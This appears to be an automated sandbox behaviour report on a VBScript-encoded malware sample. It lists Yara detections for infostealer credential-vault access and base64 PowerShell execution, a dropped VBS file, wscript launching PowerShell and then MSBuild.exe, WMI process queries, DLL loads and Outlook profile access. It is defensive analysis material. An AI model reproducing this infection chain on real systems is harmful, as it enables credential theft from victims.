                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49707 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: amsi64_6004.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: 5.2.MSBuild.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C0C52C5_2_00C0C52C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C0A9785_2_00C0A978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C04AA05_2_00C04AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C0DBE05_2_00C0DBE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C03E885_2_00C03E88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C041D05_2_00C041D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C0E4395_2_00C0E439
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FA45C05_2_05FA45C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FA35605_2_05FA3560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FA5D505_2_05FA5D50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FAA1505_2_05FAA150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FAE0D95_2_05FAE0D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FA03085_2_05FA0308
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FA92085_2_05FA9208
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FA3CC05_2_05FA3CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FA56705_2_05FA5670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FAC3705_2_05FAC370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_060FA1985_2_060FA198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_060FBC485_2_060FBC48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C0DF885_2_00C0DF88
                  Source: amsi64_6004.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 5.2.MSBuild.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBE@9/12@1/3
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-399786117
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_235jdk02.czy.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 009.vbeVirustotal: Detection: 44%
                  Source: 009.vbeReversingLabs: Detection: 21%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6004" "2764" "2772" "2788" "0" "0" "2828" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6004" "2764" "2772" "2788" "0" "0" "2828" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C00C55 push edi; retf 5_2_00C00C7A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_05FAFE30 push es; ret 5_2_05FAFE40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_060F4D50 push es; ret 5_2_060F4D60

                  Persistence and Installation Behavior

                  barindex
                  Windows Shell Script Host drops VBS files
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbsJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
